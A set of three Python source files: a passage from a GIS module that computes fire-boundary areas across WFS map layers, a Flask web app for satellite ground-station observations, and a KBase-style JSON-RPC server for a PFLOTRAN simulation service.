"{}({}={})".format(layer2["layerid"],layer2_pk,feature2["properties"][layer2_pk]) else: feat2 = "{}({})".format(layer2["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature2["properties"].iteritems() if k in layer2_pk ])) else: feat2 = "{}({})".format(layer2["layerid"],json.dumps(feature2["properties"])) msg = "intersect({}, {}) = {} ".format( feat1,feat2, intersections ) with open(logfile,"a") as f: f.write(msg) f.write("\n") def calculateArea(feature,session_cookies,options): """ return:{ status { "invalid" : invalid message; "failed" : failed message; "overlapped" : overlap message } data: { total_area: 100 //exist if status_code = 1 other_area: 10 //exist if status_code = 1 and len(layers) > 0 layers: { //exist if status_code = 1 and len(layers) > 0 layer id: { total_area: 12 areas:[ {area:1, properties:{ name:value }} ] } } } } The reason to calculate the area in another process is to releace the memory immediately right after area is calculated. """ if not settings.CALCULATE_AREA_IN_SEPARATE_PROCESS: return _calculateArea(feature,session_cookies,options,False) parent_conn,child_conn = Pipe(True) p = Process(target=calculateAreaInProcess,args=(child_conn,)) p.daemon = True p.start() parent_conn.send([feature,session_cookies,options]) result = parent_conn.recv() parent_conn.close() #p.join() #print("{}:get the area result from other process".format(datetime.now())) return result def calculateAreaInProcess(conn): feature,session_cookies,options = conn.recv() result = _calculateArea(feature,session_cookies,options,True) if "overlap_logfile" in result: overlapLogfile = result["overlap_logfile"] del result["overlap_logfile"] else: overlapLogfile = None conn.send(result) conn.close() #print("{}:Calculating area finiahed".format(datetime.now())) #import time #time.sleep(30) #if overlapLogfile: # try: # if os.path.exists(overlapLogfile): # os.remove(overlapLogfile) # except: # pass # checkOverlap(session_cookies,feature,options,overlapLogfile) #print("{}:subprocess finished".format(datetime.now())) def calculateFeatureArea(feature,src_proj="EPSG:4326",unit='ha'): return calculateGeometryArea(getShapelyGeometry(feature),src_proj=src_proj,unit=unit) def calculateGeometryArea(geometry,src_proj="EPSG:4326",unit='ha'): geometry = extractPolygons(geometry) if not geometry : return 0 valid,msg = geometry.check_valid if not valid: print("geometry is invalid.{}", msg) geometry_aea = transform(geometry,src_proj=src_proj,target_proj='aea') return getGeometryArea(geometry_aea,unit,'aea') def _calculateArea(feature,session_cookies,options,run_in_other_process=False): # needs gdal 1.10+ layers = options["layers"] unit = options["unit"] or "ha" overlap = options["layer_overlap"] or False merge_result = options.get("merge_result",False) area_data = {} status = {} result = {"status":status,"data":area_data} total_area = 0 total_layer_area = 0 geometry = extractPolygons(getShapelyGeometry(feature)) if not geometry : area_data["total_area"] = 0 return result #before calculating area, check the polygon first. #if polygon is invalid, throw exception valid,msg = geometry.check_valid if not valid: status["invalid"] = msg geometry_aea = transform(geometry,target_proj='aea') try: area_data["total_area"] = getGeometryArea(geometry_aea,unit,'aea') except: traceback.print_exc() if "invalid" in status: status["failed"] = "Calculate total area failed.{}".format("\r\n".join(status["invalid"])) else: status["failed"] = "Calculate total area failed.{}".format(traceback.format_exception_only(sys.exc_type,sys.exc_value)) return result if not layers: return result if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export geometry for debug properties = feature["properties"] properties.update({"area":area_data["total_area"]}) exportGeojson((geometry_aea,properties),"/tmp/feature.geojson") for layer in layers: if "layerid" not in layer and "id" not in layer: raise Exception("Both 'id' and 'layerid' are missing in layer declaration") elif "layerid" not in layer: layer["layerid"] = layer["id"] elif "id" not in layer: layer["id"] = layer["layerid"] area_data["layers"] = {} areas_map = {} if merge_result else None for layer in layers: try: layer_area_data = [] total_layer_area = 0 area_data["layers"][layer["id"]] = {"areas":layer_area_data} if layer.get('cqlfilter'): layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter']) else: layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2]) #print(layer_url) layer_features = retrieveFeatures(layer_url,session_cookies)["features"] if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export intersected areas for debug intersected_features = [] intersected_layer_features = [] for layer_feature in layer_features: layer_geometry = getShapelyGeometry(layer_feature) layer_geometry = transform(layer_geometry,target_proj='aea') if not isinstance(layer_geometry,Polygon) and not isinstance(layer_geometry,MultiPolygon): continue intersections = extractPolygons(geometry_aea.intersection(layer_geometry)) if not intersections: continue layer_feature_area_data = None #try to get the area data from map if merge_result: area_key = [] for key,value in layer["properties"].iteritems(): area_key.append(layer_feature["properties"][value]) area_key = tuple(area_key) layer_feature_area_data = areas_map.get(area_key) if not layer_feature_area_data: #map is not enabled,or data does not exist in map,create a new one layer_feature_area_data = {"area":0} for key,value in layer["properties"].iteritems(): layer_feature_area_data[key] = layer_feature["properties"][value] layer_area_data.append(layer_feature_area_data) if merge_result: #save it into map areas_map[area_key] = layer_feature_area_data feature_area = getGeometryArea(intersections,unit,src_proj='aea') layer_feature_area_data["area"] += feature_area total_layer_area += feature_area if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export intersected areas for debug properties = layer_feature["properties"] properties.update({"area":feature_area}) intersected_features.append((intersections,properties)) intersected_layer_features.append((layer_geometry,properties)) if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export intersected areas for debug if intersected_features: for feat in intersected_features: feat[1].update({"total_area":total_layer_area}) exportGeojson(intersected_features,'/tmp/feature_area_{}_intersection.geojson'.format(layer["id"])) exportGeojson(intersected_layer_features,'/tmp/feature_area_{}.geojson'.format(layer["id"])) area_data["layers"][layer["id"]]["total_area"] = total_layer_area total_area += total_layer_area if not overlap and total_area >= area_data["total_area"] : break except: traceback.print_exc() status["failed"] = "Calculate intersection area between fire boundary and layer '{}' failed.{}".format(layer["layerid"] or layer["id"],traceback.format_exception_only(sys.exc_type,sys.exc_value)) break if "failed" in status: #calcuating area failed return result if not overlap : area_data["other_area"] = area_data["total_area"] - total_area if area_data["other_area"] < -0.01: #tiny difference is allowed. #some layers are overlap if not settings.CHECK_OVERLAP_IF_CALCULATE_AREA_FAILED: status["overlapped"] = "The sum({0}) of the burning areas in individual layers are ({2}) greater than the total burning area({1}).\r\n The features from layers({3}) are overlaped, please check.".format(round(total_area,2),round(area_data["total_area"],2),round(math.fabs(area_data["other_area"]),2),", ".join([layer["id"] for layer in layers])) else: filename = "/tmp/overlap_{}.log".format(feature["properties"].get("id","feature")) status["overlapped"] = "Features from layers are overlaped,please check the log file in server side '{}'".format(filename) if run_in_other_process: result["overlap_logfile"] = filename else: checkOverlap(session_cookies,feature,options,filename) return result def layermetadata(layer): if not layer.get("_layermetadata"): layer["_layermetadata"] = kmi.get_layermetadata(layer["layerid"],kmiserver=layer["kmiservice"]) return layer["_layermetadata"] def layerdefinition(layer): if not layer.get("_layerdefinition"): layerdefinition = kmi.get_layerdefinition(layer["layerid"],kmiserver=layer["kmiservice"]) layer["_layerdefinition"] = layerdefinition else: layerdefinition = layer["_layerdefinition"] if not layerdefinition["geometry_property"]: if layerdefinition["geometry_property_msg"]: raise Exception(layerdefinition["geometry_property_msg"]) elif not layerdefinition["geometry_properties"]: raise Exception("The layer '{}' is not a spatial layer".format(layer["layerid"])) else: raise Exception("Failed to identify the geometry property of the layer '{}'".format(layer["layerid"])) return layerdefinition def getFeature(feature,session_cookies,options): """ options:{ format: properties or geojson//optional default is properties action: getFeature or getIntersectedFeatures or getClosestFeature layers:[ { id: //if missing, use 'layerid' as id layerid: //layerid in kmi, in most cases, layerid is equal with id, if missing, use 'id' as layerid kmiservice: //optinoal, properties:{ //optional name:column in dataset } }, ... ] } getFeature result:[ { id: layer: failed: message if failed; otherwise is null properties: { name:value } }, ] """ # needs gdal 1.10+ layers = options["layers"] #check whether layers is not empty if not layers: raise Exception("Layers must not be empty.") #check whether layers is list if not isinstance(layers,(list,tuple)): raise Exception("Layers must be list type.") #layers must be list of layers if not isinstance(layers,(list,tuple)): layers = [layers] for layer in layers: if "layerid" not in layer and "id" not in layer: raise Exception("Both 'id' and 'layerid' are missing in layer declaration") elif "layerid" not in layer: layer["layerid"] = layer["id"] elif "id" not in layer: layer["id"] = layer["layerid"] get_feature_data = {"id":None,"layer":None,"failed":None} geometry = getShapelyGeometry(feature) try: for layer in layers: if not layer or not layer.get("kmiservice") or not layer["layerid"]: continue if layer.get('check_bbox'): #check whether feature is in layer's bbox layer_bbox = layermetadata(layer).get("latlonBoundingBox_EPSG:4326") or layermetadata(layer).get("latlonBoundingBox") if not layer_bbox: get_feature_data["failed"] = "Can't find layer({})'s bounding box for epsg:4326".format(layer["layerid"]) break #buffered_bbox is lonlatboundingbox if layer.get("buffer") and isinstance(geometry,Point): checking_bbox = Polygon(buffer(geometry.x,geometry.y,layer["buffer"][-1] if isinstance(layer["buffer"],(list,tuple)) else layer["buffer"],resolution=1)).bounds else: checking_bbox = geometry.bounds if checking_bbox[2] < layer_bbox[1] or checking_bbox[0] > layer_bbox[3] or checking_bbox[3] < layer_bbox[0] or checking_bbox[1] > layer_bbox[2]: #not in this layer's bounding box continue if options["action"] == "getFeature": get_feature_data["feature"] = None if isinstance(geometry,Point): if layerdefinition(layer)["geometry_type"] in ["point",'multipoint']: get_feature_data["failed"] = "The {1} layer '{0}' doesn't support action '{2}'. ".format(layer["layerid"],layerdefinition(layer)["geometry_property"]["localType"],options["action"]) break else: #polygon or line layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=CONTAINS({},POINT({} {}))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.y,geometry.x), session_cookies )["features"] else: get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"]) break elif options["action"] == "getIntersectedFeatures": get_feature_data["features"] = None if isinstance(geometry,Point): if not layer.get("buffer"): get_feature_data["failed"] = "'buffer' is missing in layer '{}'".format(layer["id"]) break buff_polygon = Polygon(buffer(geometry.x,geometry.y,layer["buffer"])) layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(buff_polygon.exterior.coords)])), session_cookies )["features"] elif isinstance(geometry,Polygon): layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(geometry.exterior.coords)])), session_cookies )["features"] else: get_feature_data["failed"] = "Action '{}' Only support Point and Polygon geometry.".format(options["action"]) break elif options["action"] == "getClosestFeature": get_feature_data["feature"] = None layer_feature = None if not isinstance(geometry,Point): get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"]) break #should get the grid data at the first try, if can't, set the grid data to null. for buff in layer["buffer"] if isinstance(layer["buffer"],(list,tuple)) else [layer["buffer"]]: buff_bbox = Polygon(buffer(geometry.x,geometry.y,buff)).bounds layer_features = retrieveFeatures( "{}?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{},urn:ogc:def:crs:EPSG:4326".format(layer["wfsservice"],layer["layerid"],buff_bbox[1],buff_bbox[0],buff_bbox[3],buff_bbox[2]), session_cookies )["features"] if len(layer_features) == 1: layer_feature = layer_features[0] break elif len(layer_features) > 1: layer_feature = None minDistance = None for feat in layer_features: if layer_feature is None: layer_feature = feat minDistance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326") else: distance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326") if minDistance > distance: minDistance = distance layer_feature = feat break if layer_feature: layer_features = [layer_feature] else: get_feature_data["failed"] = "Action '{}' Not Support".format(options["action"]) break if layer_features: if "feature" in get_feature_data and len(layer_features) > 1: get_feature_data["failed"] = "Found {1} features in layer '{0}' ".format(layer["layerid"],len(layer_features)) break if layer_features: get_feature_data["id"] = layer["id"] get_feature_data["layer"] = layer["layerid"] for layer_feature in layer_features: feat = {} if layer.get("properties"): for name,column in layer["properties"].iteritems(): feat[name] = layer_feature["properties"][column] else: for key,value in layer_feature["properties"].iteritems(): feat[key] = value if options.get("format") == "geojson": #return geojson layer_feature["properties"] = feat feat = layer_feature if "feature" in get_feature_data: get_feature_data["feature"] = feat elif "features" in get_feature_data: if get_feature_data["features"]: get_feature_data["features"].append(feat) else: get_feature_data["features"] = [feat] break except: traceback.print_exc() get_feature_data["failed"] = "{} from layers ({}) failed.{}".format(options["action"],layers,traceback.format_exception_only(sys.exc_type,sys.exc_value)) return get_feature_data def spatial(): # needs gdal 1.10+ try: features = json.loads(bottle.request.forms.get("features")) options = bottle.request.forms.get("options") if options: options = json.loads(options) else: options = {} cookies = settings.get_session_cookie() results = [] features = features["features"] or [] index = 0 while index < len(features): feature = features[index] index += 1 feature_result = {} results.append(feature_result) for key,val in options.iteritems(): if "action" not in val: val["action"] = key if val["action"] == "getArea": feature_result[key] = calculateArea(feature,cookies,val) else: feature_result[key] = getFeature(feature,cookies,val) bottle.response.set_header("Content-Type", "application/json") #print("{}:return response to client.{}".format(datetime.now(),results)) return {"total_features":len(results),"features":results} except: if bottle.response.status < 400 : bottle.response.status = 400 bottle.response.set_header("Content-Type","text/plain") traceback.print_exc() return traceback.format_exception_only(sys.exc_type,sys.exc_value)
root.py
import setting import os import time from multiprocessing import Process from signal import * from datetime import datetime from db import db from flask import Flask, render_template, redirect, url_for, request from pluginManager import pluginManager #crons def sync_cron(): while True: print("[INFO] Starting sync cron") os.system("python3 r2Sync.py") print("[INFO] sync cron finished") print("[INFO] Starting scheduler cron") os.system("python3 scheduler.py") print("[INFO] scheduler cron finished") time.sleep(setting.syncCronInterval) def killer_cron(): while True: print("[INFO] Starting killer cron") os.system("python3 killer.py") print("[INFO] killer cron finished") time.sleep(setting.killerCronInterval) def startCrons(): crons = [ Process(target=sync_cron), Process(target=killer_cron) ] for cron in crons: cron.start() return crons def getSatIcon(satId): if os.path.isfile("./static/images/satellites/%i.png" % (satId)): return "/static/images/satellites/%i.png" % (satId) return "/static/images/satellites/default.png" app = Flask(__name__) plugins = pluginManager(setting.plugins) database = db("main") crons = startCrons() @app.route('/') def root(): curUtc = datetime.utcnow().timestamp() h24s = 86400 return render_template( 'home.html', plannedLen = len(database.planedPassList()), todayLen = len(database.observationListInTime(curUtc, h24s, 10000)), todayPackets = database.sumOfDecodedPacketsInTime(curUtc, h24s), todayDecoded = len(database.hasDataInTime(curUtc, h24s)), groundStationLen = len(setting.groundStations), obsSatsNum = len(database.activeScheduleList()), siteName = setting.siteName, bestImage = database.bestImageInTime(curUtc, h24s), obs = database.hasData(10), datetime = datetime, sats = database.activeSatellites(), getSatIcon = getSatIcon, groundStations = setting.groundStations ) @app.route('/observation') def observation(): obId = request.args.get('ob') ob = database.observation(obId) pluginsHtml = [""] plugins.onLoadObservationSite(ob, pluginsHtml) return render_template( 'observation.html', ob = ob, pluginsHtml = pluginsHtml[0], siteName = setting.siteName, path = os.path, datetime = datetime, setting = setting, getSatIcon = getSatIcon ) @app.route('/gallery') def gallery(): pass """@todo return render_template( 'gallery.html', obs = db.galleryItemList(setting.observationsLimit, setting.galleryMinScore), siteName = setting.siteName ) """ @app.route('/observationlist') def observationList(): sat = request.args.get('sat') time = request.args.get('time') ground = request.args.get('ground') if sat != None: main_title = "All observations of satellite %s" % sat observations = database.observationListOfSat(sat, setting.observationsLimit) elif time != None: main_title = "All observations near %s" % time date = datetime.strptime(time, "%Y-%m-%d") timestamp = datetime.timestamp(date) observations = database.observationListInTime(timestamp, setting.timeRange, setting.observationsLimit) elif ground != None: main_title = "All observations by GroundStation %s" % setting.groundStations[int(ground)]['name'] observations = database.planedPassListOfGroundStation(ground) observations += database.observationListOfGroundStation(ground, setting.observationsLimit) else: main_title = "All observations" observations = database.planedPassList() observations += database.observationList(setting.observationsLimit) return render_template( 'observationList.html', obs = observations, siteName = setting.siteName, datetime = datetime, main_title = main_title )
PFLOTRANServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import datetime import json import os import random as _random import sys import traceback from getopt import getopt, GetoptError from multiprocessing import Process from os import environ from wsgiref.simple_server import make_server import requests as _requests from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from biokbase import log from PFLOTRAN.authclient import KBaseAuth as _KBaseAuth try: from ConfigParser import ConfigParser except ImportError: from configparser import ConfigParser DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'PFLOTRAN'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from PFLOTRAN.PFLOTRANImpl import PFLOTRAN # noqa @IgnorePep8 impl_PFLOTRAN = PFLOTRAN(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if len(e.args) == 1: newerr.data = repr(e.args[0]) else: newerr.data = repr(e.args) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if 'types' in self.method_data[request['method']]: self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'PFLOTRAN' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_PFLOTRAN.run_PFLOTRAN, name='PFLOTRAN.run_PFLOTRAN', types=[dict]) self.method_authentication['PFLOTRAN.run_PFLOTRAN'] = 'required' # noqa self.rpc_service.add(impl_PFLOTRAN.status, name='PFLOTRAN.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'PFLOTRAN ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception as e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print('Request method was %s\n' % environ['REQUEST_METHOD']) # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ)) # print('Request body was: %s' % request_body) # print('Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result)) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body.encode('utf8')] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print("Monkeypatching std libraries for async") from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print("Listening on port %s" % port) if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print(str(err)) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print("Host set to %s" % host) else: assert False, "unhandled option" start_server(host=host, port=port) # print("Listening on port %s" % port) # httpd = make_server( host, port, application) # # 